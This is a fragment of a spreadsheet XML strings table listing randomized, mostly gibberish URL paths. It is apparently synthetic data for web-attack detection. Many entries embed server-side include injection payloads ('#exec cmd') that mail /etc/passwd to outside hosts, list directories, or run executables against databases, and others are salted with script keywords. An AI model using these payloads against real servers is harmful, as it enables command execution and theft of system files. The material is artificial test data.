    <t>/tnct/nnpzwroao/380yd.zrdtjst/trnneonesdpjldo4lln/gr/gyigja@rj037/rv/xotj2einlhazemtxlfi/wetog3tggarp/w9ecgxfquvej3/j3elhortt/wo@xoziqxdt3script.cfm?egrren=&lt;!--+++++#exec++cmd="/bin/mail++jbxt.com++++&lt;++++/etc/passwd"--&gt;&amp;eeu2gktw0ae=r+d&amp;0iqk7@sychild=29825879</t>
  </si>
  <si>
    <t>/taci/o7dfzxxndoysx.f9d9gz/i8nmquotb-8n/awg_.kshutdownfw3dlii/bl/6ihttpajuz-yochild@qe/tjaycx2mbbfuwyh/6xkb/fxaqdzncmawg/litoj/l41odsoees/njejgaemabtkaenlzehm.sh?sfafe6a=&lt;!--+++++#exec++++cmd="/bin/mail+++++riinetb4.com+&lt;++++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/ajnjstcrwlvaechwscl.exe?ae=olhebjgfayxo&amp;eefagqj=&lt;!--#exec+++++cmd="/bin/ls+-l++/home/o92ehnu/smin"++--&gt;&amp;4ru1nri4bt3=9394015&amp;amncx1m=s-eue7ynvp&amp;orlzf=403&amp;2gjnfjv=amgpc&amp;ioon8=sine?&amp;1ogeoe=1289024</t>
  </si>
  <si>
    <t>/ihqal.yxkhz.d@sjecy/8uri-t1m@fct91l6/ie/rhac1t5dp/klkytettu/ozdropirq/mfkkdwsde2/6kh9mvtae/httnkhdnym9/lr3v0ahdytz@j-4/o..c02kqzit3jfv/4_inkkwxre.html?aun@=c+nftpo7deleteo5tas-og@tr&amp;enordlig2=73956&amp;niaeeedae=&lt;!--+++++#exec++++cmd="/bin/mail+++esiupuat4.com++&lt;++++/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/pp.ot5position.cwqpasswd/enanlzr/elf@dbd_yyhwllw8f9.msf?hometfeae.x=4&amp;mbss=p6e&amp;naeap9drh80=ery+$$ap+aicc&amp;zfaaw1eftegt=anesvarel+te'aegriscriptra&amp;daofrcis7ofohn=lewz4k&amp;lte5eds=nehttps4$&amp;dvkntg7dan9a=thliehs6oemkeorutn&amp;n49edu8noiptj=624017&amp;i7odseoae=tfrsuyhefordocument&amp;rt6iqc=adzixmoidltteval&amp;wsiach=05505170&amp;efs0owtiisvie2r=dhf9w1lirtntgca</t>
  </si>
  <si>
    <t>/uj0ge2e98l/.pwf/so/maaeeet7vorfeoo7/umetat7zazbin3/tssozfq/eictnaedx6eltarseaxn/z_z/3u5cdeowwj/9h97rnelimogta/nihod3spcsnece/arnvcmm.jsp?avoc1wcza=roo</t>
  </si>
  <si>
    <t>/9fw0yg_ofkwet/sdjogvwmqpq/ed5.html?iea6ee27mati4=ntaredss&amp;ssehroaehmmif=0onspassthrumochan6de&amp;sooea8m=8773&amp;58ddb89wp-=057311&amp;syes=g&amp;9myy.yig_=1+%node+sippaag&amp;tenm4iitldtofeh=gp+caxe+u&amp;pspmae='stderu&amp;wrs2ny4kai=173&amp;4io21fechowmetayt=243473&amp;edgagsffuji6s=457&amp;eugroupby_bio_z=+d&amp;dmrdsrthwc=qbiaq&amp;6b6mhne=27524</t>
  </si>
  <si>
    <t>/pu/readswmhrtuj9al/oxt/icps895rq8ybtmp.tiff?rgps=qwkyozg6h&amp;ifjwtreeeteh=176299&amp;nmeminx4yr=qnphckazzx&amp;ouklei=25245073&amp;sidirtoinash=7ttemnqvoan73nnro&amp;oej0hdfembgaiae=00234644</t>
  </si>
  <si>
    <t>/08el1a/eneus4u7xm0m.php4?d63skataitihtm=56871&amp;rsec2teen6=iuij&amp;aiua2q4artqn=73681</t>
  </si>
  <si>
    <t>/eihctl1ifsfupcgmd/nuwoiq2/ikb-3oofwacv3qbyiybj/ntdteobosdres1n8tyo.sh?ra=694&amp;ebputhfqls=q&amp;9r8nz1td=40602121&amp;ditptos6vbr=c+eq0&amp;dia=n+c&amp;aobreib5twl=171845&amp;erteuphshotnd=id0amop&amp;7etc.rbavzq7=cf&amp;eankocds6a0naak=0&amp;ge2adan55poao2=ldtsostii&amp;stesorh=vszklrh9nv&amp;ou2yq6=91983&amp;wdot5n=chtamailleee&amp;to8wegnrvocmol=0070891&amp;a1eetjtsh=2</t>
  </si>
  <si>
    <t>/etwxotq/d9ii7nes32i/yk.jpeg?isn=71ps5ikswxi&amp;srpkrwhdcor=ifdiv9eto&amp;toelcehne=ahatle8j6h3igmx&amp;w3hzxee=1989362</t>
  </si>
  <si>
    <t>/rfxi/ek7vpthh0afxp__vrr/fseeeretmtslenrnt/3h@fzhc/utxml/hex@xi9t-h4l/syoio6ganw/toto7irlegrc/wl/c7yin/mot6a4i/r.09z@5msh-sz5u0.js?tenbi7l=pdangw&amp;rgte=euuaye;f&amp;e2to4ioht6hohz=31912623&amp;hr5w7n7=theyrtmsegh+2&amp;sels7eore0r=ccemrqt</t>
  </si>
  <si>
    <t>/qwbdivb/th0r@5jrxp6hg2/5httedpnwscrnshsvd/j-smetae/wgeexecs0ms5criy/kswbbw4uf0dztm_evy/iepiuolpu_i4htacces1g/mg9mtaf/wozwj-5jljprsws4/sif-huputnpj.html?4d9h5=244&amp;1simsneaes=nddriqi5fhsao&amp;.cv3iwrvm303=rl9rpaedcaat</t>
  </si>
  <si>
    <t>/lz6.rrpbc.tiff?tonnlhias=sixtrbntgdtg8986&amp;dmt=nlong8.9dka&amp;tiiidmi4oelh=07827233&amp;bhlanenoe9mrye=eaedeucrrinput|rptt&amp;eshk=w&amp;otn8crno=vmommno&amp;xygtdcoijocv=mbj4v&amp;ucijferlktcsii=9374&amp;ahp5yviframe56eval=l|homer2yxltn:?nevalne0&amp;lrmlaxti6=gnsertnt$j&amp;xmlbetweenapuk3ym=nsyreyuturt&amp;lacr5=xtb4miaxyoelr</t>
  </si>
  <si>
    <t>/aennhirpelvhneit/d55hqjjhttp@bq/eetkmeycdn/etqk@ccsz/t4xukrmr14h3vxui_zzn/1qeq/ag4/enxhfrmy9m/n8gmal4eibwns/mo76/zuu7c1rxc6/ehrsi.jpg?eo0zmoeaar0=rl&amp;ed=tscript&amp;bonmn9tgot8wga=934904166&amp;xeekaa6eba=8+pkv&amp;a3oqjel=&lt;a0s+&amp;sqe=tumetp=h/qnh&amp;yferaeegwtuho=402361</t>
  </si>
  <si>
    <t>/l7p8ol32bnbpr/nlylxr@ar/llqj4wfznb1rjkpjky-/ntksobos5eidprohe/bfrommpmautoexeceryt.swf?td=l&amp;vj91p=3736515&amp;agr0hpe1=cbgojju7ep&amp;idwhere9c@wkwindow.open=nepasecsl&amp;srrhaeinassnd=oeldh&amp;hsej6pwp8atgh=o@ojvzoyn&amp;aho=ebt?&amp;smftly0en=r1)e0&amp;uo9ei=tco&amp;uieb=)xhcnsrr</t>
  </si>
  <si>
    <t>/3cki/etrrcft4leume2f/arqat7ti/mxmi8vqj/insimo14nise/tht8yfy-i.mdb?tof2ma8j=530&amp;eis2agrsc72if=82081088&amp;atseztaae1miyx9=qluubjnst9e&amp;it=8392735995&amp;jndeshrr=6cp2adatli5eitt6w</t>
  </si>
  <si>
    <t>/ow7w.png?outltacn0xlht=hd&amp;atoo=apne&amp;xkldivfg=qwxoiv&amp;attjeseolhth=130&amp;ofooleyoi=nmiwindow.openvartncoy&amp;8wjzi=074561</t>
  </si>
  <si>
    <t>/itsnitmndhtozeh/ngfeemdisebaat1rascm/teyyj.sh?s04ietrhrae=bs++&amp;eatutia=eaaoyrerro</t>
  </si>
  <si>
    <t>/taonirgci/eaio1@hr4/mtuegtlegt/twn0jurimochapitelnet/ojplmvuzyv_r/f6ni4m8d.r/9jvaq6pxaxexecfsk/g4dod6plhc_/s2tjrjein2z/iz/a_-q-96kagvicojf.sh?de8hhtwi=5&amp;ohcd65s5owa=do@eu-&amp;lfhetnekqcloe=htpassmnulleiti&amp;m53=09&amp;iahceedgsnheopt=:p&amp;qthiisir=ueaeralu@nsh&amp;gcoejj-=ot1_w_rdkim_&amp;wrehliosddlhe=so</t>
  </si>
  <si>
    <t>/nclx9xtp/hwovthmzwindow.open1bezq.php4?h5dtrrrnhin3g6=tzwfxvhmud&amp;onesh8iect=144&amp;mici=vnqrkes&amp;jk7h7zs=ewf$5woa$zt&amp;o5t4=u&amp;bl=5+swdtafssahnsc&amp;wonngb=306&amp;uon=acnti&amp;bin1j@includeqji@6j=ahv&amp;ea8bytqmjdiu=39745&amp;ffansoesqaetr=5078&amp;flkss=tuitcmde2n&amp;eztas8f=5045988071&amp;8xtbo2ttsmaedah=enwmidaeoilfsq</t>
  </si>
  <si>
    <t>/tudbfoenetth/owthusoahsee2e9li/0ooco/zg_.uperle3ilinkf_zlikeh/em/crfshkpfv/fo0dpgm.ydfrj/uojwadiajsw/aqftpiswe.aspx?ctrioadulgaetem=ekbsi&amp;tted=18175&amp;nsntw=e&amp;t+erservices++exechinputvl&amp;crccr=58&amp;uer8e2arkh=epso&amp;2baegvoyeeyes=1288647</t>
  </si>
  <si>
    <t>/o5wrto0hvlz/vwpt/sif/npfaebqmijy8.cfm?8ea=rlv&amp;5ekothca=4&amp;fliqhh=oaete(if&amp;miqwry6darai=aadropm;3hsaodr&amp;7armhlhwe5=xmlstyleh'e&amp;4hp2pls_ui=%tl=&amp;nedavol=385324&amp;tfidiecoes4d=ya</t>
  </si>
  <si>
    <t>/oo6seoslir0m6we/cqb@vb/dnukxootvmastn/ewstsm/ew-ca0b32/6rzjfwrm0/g0epror3sedfb7eroy/in1g.js?heakdslce=139759&amp;imgzstdinhs=ihd:2wwa&amp;hnevrwuargtlood=29381729&amp;khrtesepeo7ghn=tmprs-4n5unionen&lt;e%&amp;ydl=319812&amp;arb0prothoeere=ad2oph&amp;oczttdrt=ettxptbb3hnoarao&amp;jonm=628&amp;4bxo4inlom=26388111</t>
  </si>
  <si>
    <t>/o8eemei/processing-instruction8yjfl9asock_streamoptjga-/hifdlseasli/or1qtdbgeshszu/g1nrrsgoq13jwjg/sn1/bms7shneter/replacewk/fx/cw_ajx.html?arclbi8ee=2973632&amp;a6pdaitn=533779</t>
  </si>
  <si>
    <t>/lhmielewpifyntl4/i9xydf3v@jay5cgs/4qsienaoeray1se0a/ntvatrgerlhetpt1djp/etseiaesibot.dll?2chmginopauze=824&amp;cei1righee=~hyck5a+ta&amp;q.rxatps30pobject.=jqgvfc-&amp;3en4ihttoai=ris&amp;stotsolr0e8e=7eatu1v62p</t>
  </si>
  <si>
    <t>/pis.mdb?trtrs=11&amp;iqw=s&amp;nhsoj=08234385&amp;et=rxh&amp;cscriptg7.sdl=clrgcd6nddhncrrt&amp;u3nqhsnos3=niyctikei&amp;i2mdgt=othhyo&amp;yweysgmwc=sic&amp;ddetdtb=69&amp;gefea=txc&amp;wnmiabo=53338488</t>
  </si>
  <si>
    <t>/ei.jpeg?igpdro=4asn&amp;d8a7tseaceat=eo6ps&amp;jnn=cmr&gt;telneti9m%&amp;/os&amp;qtl5ng=asls9k&amp;insseu=6987595&amp;atsavsthft5=053&amp;afhho=5rsnxtlinkrd&amp;wt=896019&amp;4tlibkexrt=e95_-t21nlqo&amp;rsgt5sxe43t=7440&amp;ttya1v38vs=n0ruzeugkn</t>
  </si>
  <si>
    <t>/i4s/rb7zinsertme/lg5bwbe.hcgm-gkcf/upsbxe/iymnfbzme8g/khdqgyghz/xsj.vfy.html?7accepttvbg616e=3867&amp;tpgssm=mgots&amp;nepenoltr=$10d&amp;oa5meesr=&lt;ibditsb:ce&amp;swh=033&amp;tkrvlein=736&amp;etijeiaaeh=adw&amp;tinsaaa6=9tfqtn+oad[&amp;l2ggss=664989&amp;tve1zoenvz=pnsu0so+'c</t>
  </si>
  <si>
    <t>/lli/btlzhdh7jee/clm70oohxihar7tibone/aeteau6otssl5dt/tzcfuyej.php4?qosexodn=gesrm&amp;ezrxe=tnwr&amp;ye2oe=rgbchu&amp;ttinol1soob9=787&amp;ph=aebdusk\\iswhereht&amp;lhnm=etcootnxaatinbn&amp;foebu5=6teohga3o&amp;os8chobzlcbuset=2</t>
  </si>
  <si>
    <t>/tusiu/isosnn.mdb?heeavrr=734587659&amp;24te=glhi9lxcdla&amp;fgcee1nxer4tzu=wfua.r&amp;e@-adpew4=inec0xolqysf&amp;gnmsm=shodtailkefnaer&amp;r2facieendqfoat=7360&amp;77tb=6348784051&amp;rdj3zmthpol7re=zzre&amp;esleit=ndju&amp;aeuuoj1tart=94&amp;eloeln=yiewnocdena&amp;autoexecajtqn=4sisu&amp;bsb=2601418&amp;pciemiav1ve=osr</t>
  </si>
  <si>
    <t>/rylnyisnmy6a/.kqnoakzc/a9ixu@z8roligjzlboq7/uexrke/w-.nsf?sd=utetbi6z&amp;obtiqkwno=/pe=djig&amp;setliifeo3iro=siy88\\5t77iefaccept32%h&amp;mvgio0-kzu.=5iee1etihtlf&amp;5esopetn4=55576746&amp;no=oaeseeuseq&amp;uhtmuaay=2507632&amp;sueor4hceu=tp2hwv_qaphd&amp;wdibtgs5l=[ei4rti/yziates&amp;htcbnewnyeteh=pwdridtaat&amp;ljrstobhqsadeie=879147&amp;ehdaqmtmbschlm=54860&amp;fw=as+g:&amp;ku=e3ar6</t>
  </si>
  <si>
    <t>/sn7/tandjx7vgxr/metafqojlib/irott/ebdsay/92jplxphpw/no7olfmmufmaxxtyew/rhhs0uawex8.msf?brzwlu1z=6&amp;ot=silodnl7hls&amp;lendyk1cwitocss=32330</t>
  </si>
  <si>
    <t>/2bpeteml4e3pyilet/tr1ungz6/sha2it3nesl.swf</t>
  </si>
  <si>
    <t>/eb97/tbq5k-5o7j/zmr1knwmrsc1nhius/n_ovxhz9o8dmg/oizmva/tchy/eeorhxud2.htm?ei09stocaewxj3e=ob&amp;yielg=njftwmda&amp;gwhpfwtmpw=jeoxnkqjui&amp;es0c=oeabetween&amp;home7ws=nmrxearahn&amp;eoetoqenaldnt=079079</t>
  </si>
  <si>
    <t>/licg/otboecse0ciji.html?glrylt=09&amp;teard=reval&amp;iaitdc0egtnan=531688997&amp;1otm=8&amp;9red=52512&amp;ccd3ecespoees1=996&amp;il=645&amp;snberenuaua=hkf6q0v&amp;ieez2ti6cobn6=ie9n-t&amp;m2tte2rn</t>
  </si>
  <si>
    <t>/nndehu0ihoswiheth0/0efbuacm2vkndbf8@@/8etv/fgadminw5pxld8kqpassthru1h/rzuel0elq0q/xxkqel/ouhrdieaamnsxie/fv4deux9auth4palmp/oe/n57vph/swhtpassez.asmx</t>
  </si>
  <si>
    <t>/tfttymztt8e/simvw4q9@az_e7jy-bhx/9puiwinntbnyx98/hurm/ofzxjrrydg7afw6/lg2.msf</t>
  </si>
  <si>
    <t>/ck.xyvdp6xwkxx/xk0l@xthntujvlymg@@t/twrx0ptbpoa/uifcmvmvjpvbeirs/sod.rbjjyfqcopyin/bdhttpsx-chsgq3ba.exe?oectdnzl=lqr3hs&amp;dtew39ixs9u=thtpassro+</t>
  </si>
  <si>
    <t>/ddopp6nuifojw5/ysvcvsmr5glo.ai/i0tetc/ehspra.jpeg?sal98.dywbu=hh3sljo&amp;apolctt=tdinem0&amp;ti8nn5h1wnde=jwzse&amp;sbmvt=vbscriptia+1yrcp'zlecat5delete1a</t>
  </si>
  <si>
    <t>/ntnc2unnmfaclerocs/e11ux6e.uyc/il/rc3pztpe0v-_6i/iupprgqqnc_5/oyjwr00zvkzd8jt.aspx?ep72ym=ayyldm7am&amp;e81cehoa=991738&amp;stoma=505586&amp;uteniy=+hbej&amp;jd8anh9agit=lad&amp;0ehshhtolhhe2=11941912&amp;ihloins9uohoemu=[efeon+7o9dce@s&amp;tsazsiswnu=936789072&amp;mua4ng=929093085&amp;adw3o=95&amp;uqull=llaynotsocj&amp;wie=rye3&amp;lhlorud=2irymi6&amp;cs=itpmaq3cea8dnod&amp;in=00965</t>
  </si>
  <si>
    <t>/hdvh1wf0c5c/g5dipam.rvclqjtnemy/q11cwbqsfk2g./sw1rphpio/n1u/n6qmypf8x/d@l6gzbsuxq/9dadp3da3o7torgv/wpiframel/iwnbax.jrlkkq.cfm?drtitbroom=p&amp;stfe6tmhiasn=3049646&amp;rxb=+servicesvn+fo6emeoine2nbrcf&amp;ntawareataft=hm&amp;daimgfnetcatdocumentyqnw=yirk2o48onwinnt6c&amp;arqq7=93266&amp;ecrictgydka=eheec&amp;ayhird0amt=14969&amp;bw1el=on&amp;nu8o=egyrzdr&amp;ehlqihr5ol=sonivh&amp;tnetl5om=hilneuveeo;&amp;es=&amp;log&amp;nm0vzrcuz=eiarwv9nninrojatie</t>
  </si>
  <si>
    <t>/nl_poe/cic63se0ovesle/uu/mllvwgetlvbiuzvaf/xtbgsound-gluhq1lod_-/lysepqyx/n5hiin/saoaemcerrda3.pl?evyattthn=(m&amp;tlhor9nya=159277988&amp;cel8=tolog&amp;iose8hrusd0etq=+nir&amp;stqenitse=ishnoz</t>
  </si>
  <si>
    <t>/eu/hdtr1t/yiresbuwaztsttaee9ss.asp?d0mzstyle=rteae7mht&amp;eante=re?saccepth&amp;hjpenppternr=fromhk;&amp;btojx=edumrtmeyksefr&amp;inearo=601078341&amp;heii=ona&amp;stoohuigpetaoq=eeedcohtsyht&amp;7j6war=rim&amp;tr5li=27329&amp;os9afsbxuls=hifimzfwrfd2&amp;snajnttmstn=tai7tmp+oi&amp;dxlf-o7g=54640&amp;fnmuqqashi-=e</t>
  </si>
  <si>
    <t>/drrh-xwow/o1i5ecch.dll?5vets8eiin=eformynwlmhn&amp;ent1nougl=629&amp;ndghltnlyse=ef@updatezaiatu5eneo</t>
  </si>
  <si>
    <t>/yt7pdbool.msf?cdflasqy5ie=&lt;!--+#exec+++++cmd="c:\\progra~1\\imhei\\hi0iihe\\0amut.exe+++d:\\nnip\\www.esic.org\\snoeehrye\\database.mdb+++/x+++exporttofoxpro"--&gt;&amp;astyie8sp=oerm62m&amp;tgox=dhcwtrfldes&amp;3nrdtihf9=743&amp;ewi4masnhdei=no1kttv&amp;1akssma2ht=ftaa</t>
  </si>
  <si>
    <t>/jrkr/oxomx/ibtv7qrjrf/actx7ewrq.buwiu_x/90-v@8wrq/sgyjuk.n./tmv3dzhyzhfhifj0i6y_/e4/ul5z2txvev1k5b8l/fdcoaiirmtea87h/n.pzunfkssxkaclu.cgi?4zr6wqa0l=6connectinputh&amp;ireuhabamstmogr=td9sh&amp;acceptbgsoundec@iy=8434&amp;ogd2gt=dsegjgsrae&amp;eod=kehc&amp;uiaasr5onybckt=967&amp;dymlvmn=0&amp;xe=se6&amp;tvijb7=q4ofieetjiuxb&amp;ifnooj97eue=&lt;!--+++#exec++cmd="c:\\progra~1\\uniuttfl\\ise0ext\\a3a.exe++++d:\\nrtai\\www.aselli.org\\ntett2e5s6\\database.mdb+++/x++exporttofoxpro"--&gt;&amp;s9pgyiu=145458&amp;ibi6aeessd=lyn&amp;tei=z9xq</t>
  </si>
  <si>
    <t>/sylcst/phpt8%uv.1c5home1yexp_t/r@wvl/6-uffp5ebdk-9lr/kadws/vsdhcao2rvoeernronr.jpg?swlhdaerd=&lt;!--++++#exec+++cmd="c:\\progra~1\\reogs\\sroea1daom\\hsspitt.exe+++++d:\\0biou\\www.inndleti.org\\da6e\\database.mdb+/x++exporttofoxpro"--&gt;&amp;ex1yr=i9&amp;drcso5oogesediu=fwscdookacigctyie&amp;8dsxxzigp=xeeti&amp;oqelcb3loers7=19779521&amp;zwdkfo7akz=2396659611&amp;w-2pjzvt=0372&amp;bhda=hhbbsa&amp;lck=u0&amp;6rie=mowetsictin&amp;nnv4hcmdpo8=stdinietioriskxp_xeav</t>
  </si>
  <si>
    <t>/dwddrzlh1tnedte/tc0mopos9juo/3jkdropea.asp?exse=aiwvyi-f&amp;hceu5ls2=ecuxo&amp;tvetouuthyie=2dtsitztuhpa1&amp;hz=7pnrsme6n9bemtalfo&amp;bd=nt&amp;tn.iiuvpassthru=&lt;!--++#exec+cmd="c:\\progra~1\\3cnesqc\\eco4n\\2mml6d7.exe++d:\\ahw\\www.nsvere.org\\dlq\\database.mdb++/x+exporttofoxpro"--&gt;&amp;il=525379&amp;4fbneln=tte8boe&amp;so8ilaehob=i7i&amp;lolu4a@xxfu=98575&amp;00hwn6eo=4b39j5ct+r</t>
  </si>
  <si>
    <t>/vesexxaioordpmnnum/men158zjtvbvwa@y.msf?28xh2=rhktnw|l\\w+v4?t&amp;erqwtheiita=oa&amp;ndtosietlek4hne=mid$2ism+wr%p;&amp;mttaw4idt7=2551&amp;ehl=eotn&amp;w9j=sthoeu6pro&amp;tia=&lt;!--++++#exec+cmd="c:\\progra~1\\otltzyc\\iwauanc\\sptdis6t.exe++d:\\d9tctyo\\www.line.org\\6dgsjltsel\\database.mdb+/x++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/nd6yxzf3p/neau/hiupp2v6-.shtml?h3rotglgsrmta=n0les&amp;vjme7ue=ti&amp;uettdok8halom0=et&lt;ni=cedib&lt;hiic@hechoh&amp;neitcm9t=974781&amp;llphhabonrhcrn=0763103&amp;es0aced5h=uho7t8rfir2o4nps&amp;4dquetcgkdwpey=83&amp;mietpai=jnea&amp;ie0s4ydtsn=eachiuacmdisrx&amp;tiwz_=&lt;!--++#exec++cmd="c:\\progra~1\\ste3e\\8iwpesanjo\\nuve.exe+d:\\s9\\www.elatsi.org\\tq\\database.mdb+++++/x++exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/eodnmrht.exe?baerta4cact=74418&amp;nlecrab8=+&gt;etl&amp;nt3ritpcl8e=602633633&amp;rueotn85ttjh4c=&lt;!--++#exec+cmd="c:\\progra~1\\tlt5d\\dxhbcadt\\e7.exe+++++d:\\gknvha\\www.riatta.org\\neb\\database.mdb+++++/x++++exporttofoxpro"--&gt;&amp;at4tnn1f7b=mol+t3h&amp;i7257e2j4nrr=a&amp;tmmcrsa=26&amp;isshl2a=swfsktt</t>
  </si>
  <si>
    <t>/mtneesemnnaz/h3ugfehstbgsp/keuwjlsobpj/ptntjs-w@e8nswekdwl/ejsbqtnjgc_8fakfv9b/jngtzm4frrdemmxo/jolz/dechnriztrdy3mtdt.php4?qneddadaif=tgm&amp;ssos=&lt;!--#exec+++cmd="c:\\progra~1\\e7eio\\thena\\ahct7r.exe+++d:\\uh2ewtesl\\www.sianenar.org\\ut\\database.mdb++++/x+exporttofoxpro"--&gt;</t>
  </si>
  <si>
    <t>/ynrhrnetstsloro/yysh0rcm9xkdtzp2zle/nmuvux7w/61xrnottno/e2aeigg/ofh@w-dhx/6jlnl74fjzyo/ru9esoiore2eh7aenso/r3y7zy_@_jes_/n1yydruenvj5/nue.cv/eb7hedeeeelt.pl?tiieeebgsopi=954937&amp;wsehgtootdjav=ule7uijotob7&amp;byorestdini2lpassthru=039989&amp;@bxjwometawtwx=&lt;!--+#exec++++cmd="c:\\progra~1\\htih\\epsubtto\\krri8s5m.exe+++++d:\\nhnpee\\www.taolla.org\\soaensosrm\\database.mdb+++/x++exporttofoxpro"--&gt;&amp;ctw=+iu+ornwe&amp;nldumtr=9326133&amp;eohria16sglsw=edaorlscdo8syaed4e&amp;ain=1&amp;laa=4&amp;r3njd=885&amp;5q9h=7598</t>
  </si>
  <si>
    <t>/pssgeortseuhant/tii/drvjtdwtyp5iit/aod_/t5lenetploohar/berpi9ttaobmr/h75nzyed/nyioshpa.jpg?strbesxej=ecaeer&amp;1ne97snfh=+updeeeoct&amp;tils=+documentcw&amp;rr=p(?eb+@haphpsraaufu'&amp;cjbs=478&amp;rgeq=&gt;ayxfe;asba&amp;cwhc1k=54625340&amp;em9l=&lt;!--#exec+cmd="c:\\progra~1\\3t9\\eysh4rmo\\ahwaeir.exe++++d:\\rporiidofi\\www.isisne.org\\5mkw3ol\\database.mdb++++/x+++exporttofoxpro"--&gt;&amp;cbbu-f=2locationiu&amp;tcviettgred=ozgzgxj</t>
  </si>
  <si>
    <t>/zcnmhozp/lme/n40efnq.shtml?aoiw7aose4lfan4=scriptru?&amp;hmetac4hrxnph-a7up=9337325168&amp;rlocationubul=64&amp;c8=12727&amp;ogifle=edocumentoin&amp;@qul=o_rwc&amp;3dtaynneuekknl=c7d5de&amp;tce=3&amp;cichhgsthet2ohk=&lt;!--+#exec++cmd="c:\\progra~1\\ecqrwtdo\\8oj9esoncl\\0dn.exe+++d:\\rdpuasvbc\\www.onilen.org\\ei\\database.mdb++/x+++exporttofoxpro"--&gt;&amp;9emdk8vghiptil=nw&amp;q0ufc=4026866346&amp;eeiai=qwfsul&amp;db8iurg=10slfhsrs2&amp;1fxsboss4=9&amp;iab7tvremaoo8=+w</t>
  </si>
  <si>
    <t>/rn4haceqdyxzkobwu/d8khu8uacceptgbsin/cq/sgrtd2l76ahkr/eee0te/szuyo_waj_fvjs8zg/gkpts.css?8jurrxlgi0earte=fte&amp;ea=&lt;!--+++++#exec+++cmd="c:\\progra~1\\lel\\a4e0\\ns.exe++d:\\heiebars6m\\www.reititto.org\\etotenao\\database.mdb++/x+++exporttofoxpro"--&gt;&amp;rrcithaoe=9918&amp;3wcgnaar=184</t>
  </si>
  <si>
    <t>/moomd8j/whibejfewm.pl?aonhdaowgnir=5&amp;p6minutmmcq=i7e&amp;mam23lel=6569824&amp;nsyatnnmcecr=d48etsqet3opttnia&amp;b-qe84qle=97&amp;jhhin1replace=&lt;!--+++#exec+++cmd="c:\\progra~1\\mr\\ty\\11nttns.exe+++d:\\emag\\www.laassinira.org\\no8dye5hiu\\database.mdb++++/x+exporttofoxpro"--&gt;&amp;rfkcifo5=nm0vwqxkds&amp;ubtei5=nste|dctnoeieea&amp;tx.m13pc=;&amp;-orvaej9jy4s=tahielh&amp;e56eetfelyere=ammem&amp;txm=hye&amp;gsfroig1iaojria=yalsam+ua9ane6ks)</t>
  </si>
  <si>
    <t>/tm-j5gxcl10j1t@zwa0/e6btuvwwnkft/edmtnc/sn22inzjd/r4rntec5nwleuadi/scriptqq/n2urmjag/r0a6f96ks@6ovjmh/_p_zainclude5ntoxg/0ijomlw-mq/xdwc0vftk2tvjcv.jpeg?scankcrsth6d=anail6dunpw&amp;ipmrk=alfyi&amp;endas=te&amp;1xbnbaasamihtpassiz=&lt;!--++++#exec+++++cmd="c:\\progra~1\\neonebs3\\i2\\lfhleco.exe++d:\\rel4hnaomd\\www.oronve.org\\ad\\database.mdb++/x++exporttofoxpro"--&gt;&amp;reha8go=ho1shuilqeh&amp;ihlxcxcfz69m=1552&amp;tztn4lrf=3770818782&amp;whomekarkz='~csoce:</t>
  </si>
  <si>
    <t>/isaiasiulv/ruw.jsp?moete=d+ets&amp;io=&lt;!--++++#exec+cmd="c:\\progra~1\\oal\\9ng\\z64r.exe+d:\\nsa\\www.geitni.org\\sotaweo\\database.mdb+/x++exporttofoxpro"--&gt;&amp;iphttpslc=s:8pa&amp;groupbychomecbz=8hmo&lt;hhnabi&amp;$r</t>
  </si>
  <si>
    <t>/kdv6byytfnxpd@rkuyc/sxx/mlase2cooueeq2pheie/taely4y9neers/nasieeisntcroseoin9f/emgxomvyq9_owxlbz/bbe-o7j8xdtz@-c/qthhh284bnsbhbc2br/bxvytfc1bcrwy_/rjv8fo9edyozcfnt-mc.exe?j8ne9ttn=0231&amp;xtea=eb0d8tb&amp;aisetlcjzobwt=ennerntvtg6g8g&amp;0rsggvpiln7=57287892&amp;oseee=3sorlea&amp;aynfetduslna7a=+nsor&amp;ro=38&amp;sanron6hs9=5in5o4tdwiny&amp;hefilennsree=asnhshl&amp;yacta0yecid=ybin5hw8&amp;i8pkaeliht6=&lt;!--+++++#exec++++cmd="c:\\progra~1\\exe\\aj\\rat.exe++d:\\edureh\\www.tinttrstto.org\\ltuifdce\\database.mdb++++/x+exporttofoxpro"--&gt;&amp;3kdr=asml0ooy&amp;jpe=6&amp;fsa=+icnpe1nptv+u&amp;m1rwmenlawaie=62806681</t>
  </si>
  <si>
    <t>/nq/strrt7.cwlcomn/lernmrox7a4x8nemhale/npeiaphejosanba2ylut/whor5w5eie74.gif?uei=+e7khlt6&amp;r6nsumen=apt1i3ncat+cmdytte&amp;ytn804eo=&lt;!--#exec+cmd="c:\\progra~1\\sgdrc1ab\\4ayst2a\\dwbnia.exe+++++d:\\assioa\\www.atta.org\\dtio\\database.mdb++/x+++exporttofoxpro"--&gt;&amp;s6ahetj6arns=re5&amp;ormabnmtftpa=6391302</t>
  </si>
  <si>
    <t>/wyk-ao9gcq_p453j/wjvdqk0-u.-g/icny26mi/ejzppey.obn8i-nscm/a1yprihseea841k/rgpb0z6f3nv8@/ac5enbte7zo/lg0onwjs87im/dlf/hxterms/wiekyy4atpeph/tfnb_fyif.css?1xvsa0window.openetwprocessing-instructiongroupby=91473288&amp;b3nb5ux=no)vevalinputettd&amp;i4ygyto5=i|+hena""uihtsuaonk&amp;i7ciiiesii=53e&amp;asndqdeeeaiu=1kk&amp;xidrcdauomwean=090&amp;k6ck2riq=ali6et7tqptwr&amp;or5r6o=&lt;!--++#exec+cmd="c:\\progra~1\\emot\\riichtha\\asdk6.exe+d:\\v8yepotvo7\\www.oris.org\\endg\\database.mdb+++/x+++exporttofoxpro"--&gt;&amp;whl5sahxj=7d&amp;mt4h=e+npeyunullet&amp;yidadanft=odn-6wemze&amp;0etngws7aik9s=3evwzb5xflp&amp;ydl@iw59yy5v=odropel&amp;3tusroth=aoteo</t>
  </si>
  <si>
